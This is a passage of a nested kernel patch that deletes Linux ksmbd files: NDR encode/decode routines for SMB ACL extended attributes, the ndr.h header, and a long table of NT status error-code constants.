+-			 struct xattr_smb_acl *def_acl)
+-{
+-	unsigned int ref_id = 0x00020000;
+-	int ret;
+-	vfsuid_t vfsuid;
+-	vfsgid_t vfsgid;
+-
+-	n->offset = 0;
+-	n->length = 1024;
+-	n->data = kzalloc(n->length, GFP_KERNEL);
+-	if (!n->data)
+-		return -ENOMEM;
+-
+-	if (acl) {
+-		/* ACL ACCESS */
+-		ret = ndr_write_int32(n, ref_id);
+-		ref_id += 4;
+-	} else {
+-		ret = ndr_write_int32(n, 0);
+-	}
+-	if (ret)
+-		return ret;
+-
+-	if (def_acl) {
+-		/* DEFAULT ACL ACCESS */
+-		ret = ndr_write_int32(n, ref_id);
+-		ref_id += 4;
+-	} else {
+-		ret = ndr_write_int32(n, 0);
+-	}
+-	if (ret)
+-		return ret;
+-
+-	vfsuid = i_uid_into_vfsuid(user_ns, inode);
+-	ret = ndr_write_int64(n, from_kuid(&init_user_ns, vfsuid_into_kuid(vfsuid)));
+-	if (ret)
+-		return ret;
+-	vfsgid = i_gid_into_vfsgid(user_ns, inode);
+-	ret = ndr_write_int64(n, from_kgid(&init_user_ns, vfsgid_into_kgid(vfsgid)));
+-	if (ret)
+-		return ret;
+-	ret = ndr_write_int32(n, inode->i_mode);
+-	if (ret)
+-		return ret;
+-
+-	if (acl) {
+-		ret = ndr_encode_posix_acl_entry(n, acl);
+-		if (def_acl && !ret)
+-			ret = ndr_encode_posix_acl_entry(n, def_acl);
+-	}
+-	return ret;
+-}
+-
+-int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+-{
+-	unsigned int ref_id = 0x00020004;
+-	int ret;
+-
+-	n->offset = 0;
+-	n->length = 2048;
+-	n->data = kzalloc(n->length, GFP_KERNEL);
+-	if (!n->data)
+-		return -ENOMEM;
+-
+-	ret = ndr_write_int16(n, acl->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, acl->version);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int16(n, 2);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int32(n, ref_id);
+-	if (ret)
+-		return ret;
+-
+-	/* push hash type and hash 64bytes */
+-	ret = ndr_write_int16(n, acl->hash_type);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_bytes(n, acl->desc, acl->desc_len);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_int64(n, acl->current_time);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_write_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	/* push ndr for security descriptor */
+-	ret = ndr_write_bytes(n, acl->sd_buf, acl->sd_size);
+-	return ret;
+-}
+-
+-int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+-{
+-	unsigned int version2;
+-	int ret;
+-
+-	n->offset = 0;
+-	ret = ndr_read_int16(n, &acl->version);
+-	if (ret)
+-		return ret;
+-	if (acl->version != 4) {
+-		ksmbd_debug(VFS, "v%d version is not supported\n", acl->version);
+-		return -EINVAL;
+-	}
+-
+-	ret = ndr_read_int32(n, &version2);
+-	if (ret)
+-		return ret;
+-	if (acl->version != version2) {
+-		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+-		       acl->version, version2);
+-		return -EINVAL;
+-	}
+-
+-	/* Read Level */
+-	ret = ndr_read_int16(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	/* Read Ref Id */
+-	ret = ndr_read_int32(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_int16(n, &acl->hash_type);
+-	if (ret)
+-		return ret;
+-
+-	ret = ndr_read_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	ndr_read_bytes(n, acl->desc, 10);
+-	if (strncmp(acl->desc, "posix_acl", 9)) {
+-		pr_err("Invalid acl description : %s\n", acl->desc);
+-		return -EINVAL;
+-	}
+-
+-	/* Read Time */
+-	ret = ndr_read_int64(n, NULL);
+-	if (ret)
+-		return ret;
+-
+-	/* Read Posix ACL hash */
+-	ret = ndr_read_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
+-	if (ret)
+-		return ret;
+-
+-	acl->sd_size = n->length - n->offset;
+-	acl->sd_buf = kzalloc(acl->sd_size, GFP_KERNEL);
+-	if (!acl->sd_buf)
+-		return -ENOMEM;
+-
+-	ret = ndr_read_bytes(n, acl->sd_buf, acl->sd_size);
+-	return ret;
+-}
+diff --git a/fs/ksmbd/ndr.h b/fs/ksmbd/ndr.h
+deleted file mode 100644
+index 60ca265d1bb01..0000000000000
+--- a/fs/ksmbd/ndr.h
++++ /dev/null
+@@ -1,22 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
+- *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-struct ndr {
+-	char	*data;
+-	int	offset;
+-	int	length;
+-};
+-
+-#define NDR_NTSD_OFFSETOF	0xA0
+-
+-int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
+-int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
+-int ndr_encode_posix_acl(struct ndr *n, struct user_namespace *user_ns,
+-			 struct inode *inode, struct xattr_smb_acl *acl,
+-			 struct xattr_smb_acl *def_acl);
+-int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+-int ndr_encode_v3_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+-int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+diff --git a/fs/ksmbd/nterr.h b/fs/ksmbd/nterr.h
+deleted file mode 100644
+index 2f358f88a0188..0000000000000
+--- a/fs/ksmbd/nterr.h
++++ /dev/null
+@@ -1,543 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * Unix SMB/Netbios implementation.
+- * Version 1.9.
+- * NT error code constants
+- * Copyright (C) Andrew Tridgell              1992-2000
+- * Copyright (C) John H Terpstra              1996-2000
+- * Copyright (C) Luke Kenneth Casson Leighton 1996-2000
+- * Copyright (C) Paul Ashton                  1998-2000
+- */
+-
+-#ifndef _NTERR_H
+-#define _NTERR_H
+-
+-/* Win32 Status codes. */
+-#define NT_STATUS_MORE_ENTRIES         0x0105
+-#define NT_ERROR_INVALID_PARAMETER     0x0057
+-#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
+-#define NT_STATUS_1804                 0x070c
+-#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
+-#define NT_STATUS_INVALID_LOCK_RANGE   (0xC0000000 | 0x01a1)
+-/*
+- * Win32 Error codes extracted using a loop in smbclient then printing a netmon
+- * sniff to a file.
+- */
+-
+-#define NT_STATUS_OK                   0x0000
+-#define NT_STATUS_SOME_UNMAPPED        0x0107
+-#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
+-#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
+-#define NT_STATUS_MEDIA_CHANGED    0x8000001c
+-#define NT_STATUS_END_OF_MEDIA     0x8000001e
+-#define NT_STATUS_MEDIA_CHECK      0x80000020
+-#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
+-#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
+-#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
+-#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
+-#define NT_STATUS_UNSUCCESSFUL (0xC0000000 | 0x0001)
+-#define NT_STATUS_NOT_IMPLEMENTED (0xC0000000 | 0x0002)
+-#define NT_STATUS_INVALID_INFO_CLASS (0xC0000000 | 0x0003)
+-#define NT_STATUS_INFO_LENGTH_MISMATCH (0xC0000000 | 0x0004)
+-#define NT_STATUS_ACCESS_VIOLATION (0xC0000000 | 0x0005)
+-#define NT_STATUS_IN_PAGE_ERROR (0xC0000000 | 0x0006)
+-#define NT_STATUS_PAGEFILE_QUOTA (0xC0000000 | 0x0007)
+-#define NT_STATUS_INVALID_HANDLE (0xC0000000 | 0x0008)
+-#define NT_STATUS_BAD_INITIAL_STACK (0xC0000000 | 0x0009)
+-#define NT_STATUS_BAD_INITIAL_PC (0xC0000000 | 0x000a)
+-#define NT_STATUS_INVALID_CID (0xC0000000 | 0x000b)
+-#define NT_STATUS_TIMER_NOT_CANCELED (0xC0000000 | 0x000c)
+-#define NT_STATUS_INVALID_PARAMETER (0xC0000000 | 0x000d)
+-#define NT_STATUS_NO_SUCH_DEVICE (0xC0000000 | 0x000e)
+-#define NT_STATUS_NO_SUCH_FILE (0xC0000000 | 0x000f)
+-#define NT_STATUS_INVALID_DEVICE_REQUEST (0xC0000000 | 0x0010)
+-#define NT_STATUS_END_OF_FILE (0xC0000000 | 0x0011)
+-#define NT_STATUS_WRONG_VOLUME (0xC0000000 | 0x0012)
+-#define NT_STATUS_NO_MEDIA_IN_DEVICE (0xC0000000 | 0x0013)
+-#define NT_STATUS_UNRECOGNIZED_MEDIA (0xC0000000 | 0x0014)
+-#define NT_STATUS_NONEXISTENT_SECTOR (0xC0000000 | 0x0015)
+-#define NT_STATUS_MORE_PROCESSING_REQUIRED (0xC0000000 | 0x0016)
+-#define NT_STATUS_NO_MEMORY (0xC0000000 | 0x0017)
+-#define NT_STATUS_CONFLICTING_ADDRESSES (0xC0000000 | 0x0018)
+-#define NT_STATUS_NOT_MAPPED_VIEW (0xC0000000 | 0x0019)
+-#define NT_STATUS_UNABLE_TO_FREE_VM (0x80000000 | 0x001a)
+-#define NT_STATUS_UNABLE_TO_DELETE_SECTION (0xC0000000 | 0x001b)
+-#define NT_STATUS_INVALID_SYSTEM_SERVICE (0xC0000000 | 0x001c)
+-#define NT_STATUS_ILLEGAL_INSTRUCTION (0xC0000000 | 0x001d)
+-#define NT_STATUS_INVALID_LOCK_SEQUENCE (0xC0000000 | 0x001e)
+-#define NT_STATUS_INVALID_VIEW_SIZE (0xC0000000 | 0x001f)
+-#define NT_STATUS_INVALID_FILE_FOR_SECTION (0xC0000000 | 0x0020)
+-#define NT_STATUS_ALREADY_COMMITTED (0xC0000000 | 0x0021)
+-#define NT_STATUS_ACCESS_DENIED (0xC0000000 | 0x0022)
+-#define NT_STATUS_BUFFER_TOO_SMALL (0xC0000000 | 0x0023)
+-#define NT_STATUS_OBJECT_TYPE_MISMATCH (0xC0000000 | 0x0024)
+-#define NT_STATUS_NONCONTINUABLE_EXCEPTION (0xC0000000 | 0x0025)
+-#define NT_STATUS_INVALID_DISPOSITION (0xC0000000 | 0x0026)
+-#define NT_STATUS_UNWIND (0xC0000000 | 0x0027)
+-#define NT_STATUS_BAD_STACK (0xC0000000 | 0x0028)
+-#define NT_STATUS_INVALID_UNWIND_TARGET (0xC0000000 | 0x0029)
+-#define NT_STATUS_NOT_LOCKED (0xC0000000 | 0x002a)
+-#define NT_STATUS_PARITY_ERROR (0xC0000000 | 0x002b)
+-#define NT_STATUS_UNABLE_TO_DECOMMIT_VM (0xC0000000 | 0x002c)
+-#define NT_STATUS_NOT_COMMITTED (0xC0000000 | 0x002d)
+-#define NT_STATUS_INVALID_PORT_ATTRIBUTES (0xC0000000 | 0x002e)
+-#define NT_STATUS_PORT_MESSAGE_TOO_LONG (0xC0000000 | 0x002f)
+-#define NT_STATUS_INVALID_PARAMETER_MIX (0xC0000000 | 0x0030)
+-#define NT_STATUS_INVALID_QUOTA_LOWER (0xC0000000 | 0x0031)
+-#define NT_STATUS_DISK_CORRUPT_ERROR (0xC0000000 | 0x0032)
+-#define NT_STATUS_OBJECT_NAME_INVALID (0xC0000000 | 0x0033)
+-#define NT_STATUS_OBJECT_NAME_NOT_FOUND (0xC0000000 | 0x0034)
+-#define NT_STATUS_OBJECT_NAME_COLLISION (0xC0000000 | 0x0035)
+-#define NT_STATUS_HANDLE_NOT_WAITABLE (0xC0000000 | 0x0036)
+-#define NT_STATUS_PORT_DISCONNECTED (0xC0000000 | 0x0037)
+-#define NT_STATUS_DEVICE_ALREADY_ATTACHED (0xC0000000 | 0x0038)
+-#define NT_STATUS_OBJECT_PATH_INVALID (0xC0000000 | 0x0039)
+-#define NT_STATUS_OBJECT_PATH_NOT_FOUND (0xC0000000 | 0x003a)
+-#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD (0xC0000000 | 0x003b)
+-#define NT_STATUS_DATA_OVERRUN (0xC0000000 | 0x003c)
+-#define NT_STATUS_DATA_LATE_ERROR (0xC0000000 | 0x003d)
+-#define NT_STATUS_DATA_ERROR (0xC0000000 | 0x003e)
+-#define NT_STATUS_CRC_ERROR (0xC0000000 | 0x003f)
+-#define NT_STATUS_SECTION_TOO_BIG (0xC0000000 | 0x0040)
+-#define NT_STATUS_PORT_CONNECTION_REFUSED (0xC0000000 | 0x0041)
+-#define NT_STATUS_INVALID_PORT_HANDLE (0xC0000000 | 0x0042)
+-#define NT_STATUS_SHARING_VIOLATION (0xC0000000 | 0x0043)
+-#define NT_STATUS_QUOTA_EXCEEDED (0xC0000000 | 0x0044)
+-#define NT_STATUS_INVALID_PAGE_PROTECTION (0xC0000000 | 0x0045)
+-#define NT_STATUS_MUTANT_NOT_OWNED (0xC0000000 | 0x0046)
+-#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED (0xC0000000 | 0x0047)
+-#define NT_STATUS_PORT_ALREADY_SET (0xC0000000 | 0x0048)
+-#define NT_STATUS_SECTION_NOT_IMAGE (0xC0000000 | 0x0049)
+-#define NT_STATUS_SUSPEND_COUNT_EXCEEDED (0xC0000000 | 0x004a)
+-#define NT_STATUS_THREAD_IS_TERMINATING (0xC0000000 | 0x004b)
+-#define NT_STATUS_BAD_WORKING_SET_LIMIT (0xC0000000 | 0x004c)
+-#define NT_STATUS_INCOMPATIBLE_FILE_MAP (0xC0000000 | 0x004d)
+-#define NT_STATUS_SECTION_PROTECTION (0xC0000000 | 0x004e)
+-#define NT_STATUS_EAS_NOT_SUPPORTED (0xC0000000 | 0x004f)
+-#define NT_STATUS_EA_TOO_LARGE (0xC0000000 | 0x0050)
+-#define NT_STATUS_NONEXISTENT_EA_ENTRY (0xC0000000 | 0x0051)
+-#define NT_STATUS_NO_EAS_ON_FILE (0xC0000000 | 0x0052)
+-#define NT_STATUS_EA_CORRUPT_ERROR (0xC0000000 | 0x0053)
+-#define NT_STATUS_FILE_LOCK_CONFLICT (0xC0000000 | 0x0054)
+-#define NT_STATUS_LOCK_NOT_GRANTED (0xC0000000 | 0x0055)
+-#define NT_STATUS_DELETE_PENDING (0xC0000000 | 0x0056)
+-#define NT_STATUS_CTL_FILE_NOT_SUPPORTED (0xC0000000 | 0x0057)
+-#define NT_STATUS_UNKNOWN_REVISION (0xC0000000 | 0x0058)
+-#define NT_STATUS_REVISION_MISMATCH (0xC0000000 | 0x0059)
+-#define NT_STATUS_INVALID_OWNER (0xC0000000 | 0x005a)
+-#define NT_STATUS_INVALID_PRIMARY_GROUP (0xC0000000 | 0x005b)
+-#define NT_STATUS_NO_IMPERSONATION_TOKEN (0xC0000000 | 0x005c)
+-#define NT_STATUS_CANT_DISABLE_MANDATORY (0xC0000000 | 0x005d)
+-#define NT_STATUS_NO_LOGON_SERVERS (0xC0000000 | 0x005e)
+-#define NT_STATUS_NO_SUCH_LOGON_SESSION (0xC0000000 | 0x005f)
+-#define NT_STATUS_NO_SUCH_PRIVILEGE (0xC0000000 | 0x0060)
+-#define NT_STATUS_PRIVILEGE_NOT_HELD (0xC0000000 | 0x0061)
+-#define NT_STATUS_INVALID_ACCOUNT_NAME (0xC0000000 | 0x0062)
+-#define NT_STATUS_USER_EXISTS (0xC0000000 | 0x0063)
+-#define NT_STATUS_NO_SUCH_USER (0xC0000000 | 0x0064)
+-#define NT_STATUS_GROUP_EXISTS (0xC0000000 | 0x0065)
+-#define NT_STATUS_NO_SUCH_GROUP (0xC0000000 | 0x0066)
+-#define NT_STATUS_MEMBER_IN_GROUP (0xC0000000 | 0x0067)
+-#define NT_STATUS_MEMBER_NOT_IN_GROUP (0xC0000000 | 0x0068)
+-#define NT_STATUS_LAST_ADMIN (0xC0000000 | 0x0069)
+-#define NT_STATUS_WRONG_PASSWORD (0xC0000000 | 0x006a)
+-#define NT_STATUS_ILL_FORMED_PASSWORD (0xC0000000 | 0x006b)
+-#define NT_STATUS_PASSWORD_RESTRICTION (0xC0000000 | 0x006c)
+-#define NT_STATUS_LOGON_FAILURE (0xC0000000 | 0x006d)
+-#define NT_STATUS_ACCOUNT_RESTRICTION (0xC0000000 | 0x006e)
+-#define NT_STATUS_INVALID_LOGON_HOURS (0xC0000000 | 0x006f)
+-#define NT_STATUS_INVALID_WORKSTATION (0xC0000000 | 0x0070)
+-#define NT_STATUS_PASSWORD_EXPIRED (0xC0000000 | 0x0071)
+-#define NT_STATUS_ACCOUNT_DISABLED (0xC0000000 | 0x0072)
+-#define NT_STATUS_NONE_MAPPED (0xC0000000 | 0x0073)
+-#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED (0xC0000000 | 0x0074)
+-#define NT_STATUS_LUIDS_EXHAUSTED (0xC0000000 | 0x0075)
+-#define NT_STATUS_INVALID_SUB_AUTHORITY (0xC0000000 | 0x0076)
+-#define NT_STATUS_INVALID_ACL (0xC0000000 | 0x0077)
+-#define NT_STATUS_INVALID_SID (0xC0000000 | 0x0078)
+-#define NT_STATUS_INVALID_SECURITY_DESCR (0xC0000000 | 0x0079)
+-#define NT_STATUS_PROCEDURE_NOT_FOUND (0xC0000000 | 0x007a)
+-#define NT_STATUS_INVALID_IMAGE_FORMAT (0xC0000000 | 0x007b)
+-#define NT_STATUS_NO_TOKEN (0xC0000000 | 0x007c)
+-#define NT_STATUS_BAD_INHERITANCE_ACL (0xC0000000 | 0x007d)
+-#define NT_STATUS_RANGE_NOT_LOCKED (0xC0000000 | 0x007e)
+-#define NT_STATUS_DISK_FULL (0xC0000000 | 0x007f)
+-#define NT_STATUS_SERVER_DISABLED (0xC0000000 | 0x0080)
+-#define NT_STATUS_SERVER_NOT_DISABLED (0xC0000000 | 0x0081)
+-#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED (0xC0000000 | 0x0082)
+-#define NT_STATUS_GUIDS_EXHAUSTED (0xC0000000 | 0x0083)
+-#define NT_STATUS_INVALID_ID_AUTHORITY (0xC0000000 | 0x0084)
+-#define NT_STATUS_AGENTS_EXHAUSTED (0xC0000000 | 0x0085)
+-#define NT_STATUS_INVALID_VOLUME_LABEL (0xC0000000 | 0x0086)
+-#define NT_STATUS_SECTION_NOT_EXTENDED (0xC0000000 | 0x0087)
+-#define NT_STATUS_NOT_MAPPED_DATA (0xC0000000 | 0x0088)
+-#define NT_STATUS_RESOURCE_DATA_NOT_FOUND (0xC0000000 | 0x0089)
+-#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND (0xC0000000 | 0x008a)
+-#define NT_STATUS_RESOURCE_NAME_NOT_FOUND (0xC0000000 | 0x008b)
+-#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED (0xC0000000 | 0x008c)
+-#define NT_STATUS_FLOAT_DENORMAL_OPERAND (0xC0000000 | 0x008d)
+-#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO (0xC0000000 | 0x008e)
+-#define NT_STATUS_FLOAT_INEXACT_RESULT (0xC0000000 | 0x008f)
+-#define NT_STATUS_FLOAT_INVALID_OPERATION (0xC0000000 | 0x0090)
+-#define NT_STATUS_FLOAT_OVERFLOW (0xC0000000 | 0x0091)
+-#define NT_STATUS_FLOAT_STACK_CHECK (0xC0000000 | 0x0092)
+-#define NT_STATUS_FLOAT_UNDERFLOW (0xC0000000 | 0x0093)
+-#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO (0xC0000000 | 0x0094)
+-#define NT_STATUS_INTEGER_OVERFLOW (0xC0000000 | 0x0095)
+-#define NT_STATUS_PRIVILEGED_INSTRUCTION (0xC0000000 | 0x0096)
+-#define NT_STATUS_TOO_MANY_PAGING_FILES (0xC0000000 | 0x0097)
+-#define NT_STATUS_FILE_INVALID (0xC0000000 | 0x0098)
+-#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED (0xC0000000 | 0x0099)
+-#define NT_STATUS_INSUFFICIENT_RESOURCES (0xC0000000 | 0x009a)
+-#define NT_STATUS_DFS_EXIT_PATH_FOUND (0xC0000000 | 0x009b)
+-#define NT_STATUS_DEVICE_DATA_ERROR (0xC0000000 | 0x009c)
+-#define NT_STATUS_DEVICE_NOT_CONNECTED (0xC0000000 | 0x009d)
+-#define NT_STATUS_DEVICE_POWER_FAILURE (0xC0000000 | 0x009e)
+-#define NT_STATUS_FREE_VM_NOT_AT_BASE (0xC0000000 | 0x009f)
+-#define NT_STATUS_MEMORY_NOT_ALLOCATED (0xC0000000 | 0x00a0)
+-#define NT_STATUS_WORKING_SET_QUOTA (0xC0000000 | 0x00a1)
+-#define NT_STATUS_MEDIA_WRITE_PROTECTED (0xC0000000 | 0x00a2)
+-#define NT_STATUS_DEVICE_NOT_READY (0xC0000000 | 0x00a3)
+-#define NT_STATUS_INVALID_GROUP_ATTRIBUTES (0xC0000000 | 0x00a4)
+-#define NT_STATUS_BAD_IMPERSONATION_LEVEL (0xC0000000 | 0x00a5)
+-#define NT_STATUS_CANT_OPEN_ANONYMOUS (0xC0000000 | 0x00a6)
+-#define NT_STATUS_BAD_VALIDATION_CLASS (0xC0000000 | 0x00a7)
+-#define NT_STATUS_BAD_TOKEN_TYPE (0xC0000000 | 0x00a8)
+-#define NT_STATUS_BAD_MASTER_BOOT_RECORD (0xC0000000 | 0x00a9)
+-#define NT_STATUS_INSTRUCTION_MISALIGNMENT (0xC0000000 | 0x00aa)
+-#define NT_STATUS_INSTANCE_NOT_AVAILABLE (0xC0000000 | 0x00ab)
+-#define NT_STATUS_PIPE_NOT_AVAILABLE (0xC0000000 | 0x00ac)
+-#define NT_STATUS_INVALID_PIPE_STATE (0xC0000000 | 0x00ad)
+-#define NT_STATUS_PIPE_BUSY (0xC0000000 | 0x00ae)
+-#define NT_STATUS_ILLEGAL_FUNCTION (0xC0000000 | 0x00af)
+-#define NT_STATUS_PIPE_DISCONNECTED (0xC0000000 | 0x00b0)
+-#define NT_STATUS_PIPE_CLOSING (0xC0000000 | 0x00b1)
+-#define NT_STATUS_PIPE_CONNECTED (0xC0000000 | 0x00b2)
+-#define NT_STATUS_PIPE_LISTENING (0xC0000000 | 0x00b3)
+-#define NT_STATUS_INVALID_READ_MODE (0xC0000000 | 0x00b4)
+-#define NT_STATUS_IO_TIMEOUT (0xC0000000 | 0x00b5)
+-#define NT_STATUS_FILE_FORCED_CLOSED (0xC0000000 | 0x00b6)
+-#define NT_STATUS_PROFILING_NOT_STARTED (0xC0000000 | 0x00b7)
+-#define NT_STATUS_PROFILING_NOT_STOPPED (0xC0000000 | 0x00b8)
+-#define NT_STATUS_COULD_NOT_INTERPRET (0xC0000000 | 0x00b9)
+-#define NT_STATUS_FILE_IS_A_DIRECTORY (0xC0000000 | 0x00ba)
+-#define NT_STATUS_NOT_SUPPORTED (0xC0000000 | 0x00bb)
+-#define NT_STATUS_REMOTE_NOT_LISTENING (0xC0000000 | 0x00bc)
+-#define NT_STATUS_DUPLICATE_NAME (0xC0000000 | 0x00bd)
+-#define NT_STATUS_BAD_NETWORK_PATH (0xC0000000 | 0x00be)
+-#define NT_STATUS_NETWORK_BUSY (0xC0000000 | 0x00bf)
+-#define NT_STATUS_DEVICE_DOES_NOT_EXIST (0xC0000000 | 0x00c0)
+-#define NT_STATUS_TOO_MANY_COMMANDS (0xC0000000 | 0x00c1)
+-#define NT_STATUS_ADAPTER_HARDWARE_ERROR (0xC0000000 | 0x00c2)
+-#define NT_STATUS_INVALID_NETWORK_RESPONSE (0xC0000000 | 0x00c3)
+-#define NT_STATUS_UNEXPECTED_NETWORK_ERROR (0xC0000000 | 0x00c4)
+-#define NT_STATUS_BAD_REMOTE_ADAPTER (0xC0000000 | 0x00c5)
+-#define NT_STATUS_PRINT_QUEUE_FULL (0xC0000000 | 0x00c6)
+-#define NT_STATUS_NO_SPOOL_SPACE (0xC0000000 | 0x00c7)
+-#define NT_STATUS_PRINT_CANCELLED (0xC0000000 | 0x00c8)
+-#define NT_STATUS_NETWORK_NAME_DELETED (0xC0000000 | 0x00c9)
+-#define NT_STATUS_NETWORK_ACCESS_DENIED (0xC0000000 | 0x00ca)
+-#define NT_STATUS_BAD_DEVICE_TYPE (0xC0000000 | 0x00cb)
+-#define NT_STATUS_BAD_NETWORK_NAME (0xC0000000 | 0x00cc)
+-#define NT_STATUS_TOO_MANY_NAMES (0xC0000000 | 0x00cd)
+-#define NT_STATUS_TOO_MANY_SESSIONS (0xC0000000 | 0x00ce)
+-#define NT_STATUS_SHARING_PAUSED (0xC0000000 | 0x00cf)
+-#define NT_STATUS_REQUEST_NOT_ACCEPTED (0xC0000000 | 0x00d0)
+-#define NT_STATUS_REDIRECTOR_PAUSED (0xC0000000 | 0x00d1)
+-#define NT_STATUS_NET_WRITE_FAULT (0xC0000000 | 0x00d2)
+-#define NT_STATUS_PROFILING_AT_LIMIT (0xC0000000 | 0x00d3)
+-#define NT_STATUS_NOT_SAME_DEVICE (0xC0000000 | 0x00d4)
+-#define NT_STATUS_FILE_RENAMED (0xC0000000 | 0x00d5)
+-#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED (0xC0000000 | 0x00d6)
+-#define NT_STATUS_NO_SECURITY_ON_OBJECT (0xC0000000 | 0x00d7)
+-#define NT_STATUS_CANT_WAIT (0xC0000000 | 0x00d8)
+-#define NT_STATUS_PIPE_EMPTY (0xC0000000 | 0x00d9)
+-#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO (0xC0000000 | 0x00da)
+-#define NT_STATUS_CANT_TERMINATE_SELF (0xC0000000 | 0x00db)
+-#define NT_STATUS_INVALID_SERVER_STATE (0xC0000000 | 0x00dc)
+-#define NT_STATUS_INVALID_DOMAIN_STATE (0xC0000000 | 0x00dd)
+-#define NT_STATUS_INVALID_DOMAIN_ROLE (0xC0000000 | 0x00de)
+-#define NT_STATUS_NO_SUCH_DOMAIN (0xC0000000 | 0x00df)
+-#define NT_STATUS_DOMAIN_EXISTS (0xC0000000 | 0x00e0)
+-#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED (0xC0000000 | 0x00e1)
+-#define NT_STATUS_OPLOCK_NOT_GRANTED (0xC0000000 | 0x00e2)
+-#define NT_STATUS_INVALID_OPLOCK_PROTOCOL (0xC0000000 | 0x00e3)
+-#define NT_STATUS_INTERNAL_DB_CORRUPTION (0xC0000000 | 0x00e4)
+-#define NT_STATUS_INTERNAL_ERROR (0xC0000000 | 0x00e5)
+-#define NT_STATUS_GENERIC_NOT_MAPPED (0xC0000000 | 0x00e6)
+-#define NT_STATUS_BAD_DESCRIPTOR_FORMAT (0xC0000000 | 0x00e7)
+-#define NT_STATUS_INVALID_USER_BUFFER (0xC0000000 | 0x00e8)
+-#define NT_STATUS_UNEXPECTED_IO_ERROR (0xC0000000 | 0x00e9)
+-#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR (0xC0000000 | 0x00ea)
+-#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR (0xC0000000 | 0x00eb)
+-#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR (0xC0000000 | 0x00ec)
+-#define NT_STATUS_NOT_LOGON_PROCESS (0xC0000000 | 0x00ed)
+-#define NT_STATUS_LOGON_SESSION_EXISTS (0xC0000000 | 0x00ee)
+-#define NT_STATUS_INVALID_PARAMETER_1 (0xC0000000 | 0x00ef)
+-#define NT_STATUS_INVALID_PARAMETER_2 (0xC0000000 | 0x00f0)
+-#define NT_STATUS_INVALID_PARAMETER_3 (0xC0000000 | 0x00f1)
+-#define NT_STATUS_INVALID_PARAMETER_4 (0xC0000000 | 0x00f2)
+-#define NT_STATUS_INVALID_PARAMETER_5 (0xC0000000 | 0x00f3)
+-#define NT_STATUS_INVALID_PARAMETER_6 (0xC0000000 | 0x00f4)
+-#define NT_STATUS_INVALID_PARAMETER_7 (0xC0000000 | 0x00f5)
+-#define NT_STATUS_INVALID_PARAMETER_8 (0xC0000000 | 0x00f6)
+-#define NT_STATUS_INVALID_PARAMETER_9 (0xC0000000 | 0x00f7)
+-#define NT_STATUS_INVALID_PARAMETER_10 (0xC0000000 | 0x00f8)
+-#define NT_STATUS_INVALID_PARAMETER_11 (0xC0000000 | 0x00f9)
+-#define NT_STATUS_INVALID_PARAMETER_12 (0xC0000000 | 0x00fa)
+-#define NT_STATUS_REDIRECTOR_NOT_STARTED (0xC0000000 | 0x00fb)
+-#define NT_STATUS_REDIRECTOR_STARTED (0xC0000000 | 0x00fc)
+-#define NT_STATUS_STACK_OVERFLOW (0xC0000000 | 0x00fd)
+-#define NT_STATUS_NO_SUCH_PACKAGE (0xC0000000 | 0x00fe)
+-#define NT_STATUS_BAD_FUNCTION_TABLE (0xC0000000 | 0x00ff)
+-#define NT_STATUS_DIRECTORY_NOT_EMPTY (0xC0000000 | 0x0101)
+-#define NT_STATUS_FILE_CORRUPT_ERROR (0xC0000000 | 0x0102)
+-#define NT_STATUS_NOT_A_DIRECTORY (0xC0000000 | 0x0103)
+-#define NT_STATUS_BAD_LOGON_SESSION_STATE (0xC0000000 | 0x0104)
+-#define NT_STATUS_LOGON_SESSION_COLLISION (0xC0000000 | 0x0105)
+-#define NT_STATUS_NAME_TOO_LONG (0xC0000000 | 0x0106)
